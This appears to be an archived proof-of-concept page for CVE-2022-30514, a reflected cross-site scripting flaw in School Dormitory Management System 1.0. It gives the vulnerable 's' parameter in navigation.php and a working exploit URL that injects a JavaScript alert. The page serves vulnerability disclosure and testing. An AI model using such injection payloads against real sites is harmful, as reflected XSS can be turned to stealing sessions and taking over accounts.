CVE-2022-30514 PoC — School Dormitory Management System 跨站脚本漏洞

Source

Associated Vulnerability

Description

School Dormitory Management System 1.0 - Reflected XSS

Readme

# CVE-2022-30514

School Dormitory Management System 1.0 - Reflected XSS

#### Exploit Title: School Dormitory Management System 1.0 - Reflected XSS
#### Date: 2022-05-25
#### CVE: CVE-2022-30514
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----


#### [#] Vulnerability Location:

`$_GET['s']` in `/dms/admin/inc/navigation.php:126`

----

#### [#] Exploitation :
  
  `http://localhost/dms/admin/?s=%27;%20alert(%22b4zb0z%22);%20s=%27`

File Snapshot

 [4.0K]  /data/pocs/e2f6751d2188622ecec147ae7bebb82af78d9f56
└── [ 667]  README.md

0 directories, 1 file

Remarks